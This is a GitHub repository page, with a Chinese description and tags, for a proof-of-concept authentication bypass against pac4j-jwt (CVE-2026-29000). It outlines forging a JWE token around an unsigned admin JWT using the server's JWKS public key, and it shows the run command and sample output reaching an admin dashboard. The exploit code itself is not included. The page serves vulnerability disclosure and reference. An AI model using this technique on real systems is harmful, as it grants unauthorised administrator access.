manbahadurthapa1248/CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC
GitHub: manbahadurthapa1248/CVE-2026-29000---pac4j-jwt-Authentication-Bypass-PoC
针对CVE-2026-29000漏洞的验证工具,通过获取JWKS公钥伪造JWE令牌实现pac4j-jwt认证绕过。
Stars: 0 | Forks: 0
# **CVE-2026-29000 - pac4j-jwt 认证绕过 PoC**
*注意:这不是我的原创工作。我将其保留在此处以供参考。*
**工作原理:**
```
python3 exploit.py http://IP:PORT
[*] Fetching JWKS...
[+] Got RSA public key (kid: enc-key-1)
[*] Crafted PlainJWT with sub=admin, role=ROLE_ADMIN
[+] Forged JWE token created
[*] Accessing /api/dashboard...
[+] Status: 200
[+] Authenticated as: admin (ROLE_ADMIN)
[+] Token: eyJhbGciOiAiUlN_.....[Redacted].....D4zwSEY05lFkCB.J933HR-irY6a0r2uivRLZw
```
标签:CVE-2026-29000, GHAS, Java安全, JSON Web Token, JWE伪造, JWKS泄露, JWT伪造, Maven, pac4j-jwt, PoC, RSA公钥泄露, Web安全, 协议分析, 暴力破解, 权限提升, 漏洞验证, 蓝队分析, 认证绕过, 访问控制失效, 身份验证绕过